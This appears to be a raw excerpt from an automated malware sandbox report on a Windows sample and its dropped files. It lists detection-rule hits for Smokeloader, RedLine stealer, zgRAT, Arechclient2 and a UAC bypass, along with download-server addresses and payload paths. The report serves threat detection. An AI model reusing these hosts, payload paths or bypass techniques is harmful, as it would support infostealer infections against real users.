                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 04329F27 appears 48 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: String function: 043236F8 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 00801310 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 00801900 appears 31 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 008014F0 appears 60 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 6C924701 appears 64 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 00989D36 appears 35 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 6C926320 appears 31 times
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: String function: 00801930 appears 76 times
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476
                            Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBCClipboard.exe> vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000002.1557905240.0000000004047000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs zLwT7vCojz.exe
                            Source: zLwT7vCojz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@26/89@5/7
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C257030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,10_2_6C257030
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0083D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,18_2_0083D660
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043AD8CE CreateToolhelp32Snapshot,Module32First,0_2_043AD8CE
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00818040 LoadResource,LockResource,SizeofResource,18_2_00818040
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5496
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3912
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile created: C:\Users\user~1\AppData\Local\Temp\u48o.0.exeJump to behavior
                            Source: Yara matchFile source: 14.0.u48o.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000000.1354291806.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1362288506.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Installed0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Installed0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: @0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: one0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: one0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: two0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: two0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: five0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: five0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: seven0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: seven0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: eight0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: eight0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: nine0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: nine0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: ten0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: ten0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.900_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Installed0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Installed0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.590_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /syncUpd.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /1/Qg_Appv5.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Qg_Appv5.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: Qg_Appv5.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: 185.172.128.2280_2_04344DA5
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCommand line argument: /BroomSetup.exe0_2_04344DA5
                            Source: zLwT7vCojz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: u48o.0.exe, u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
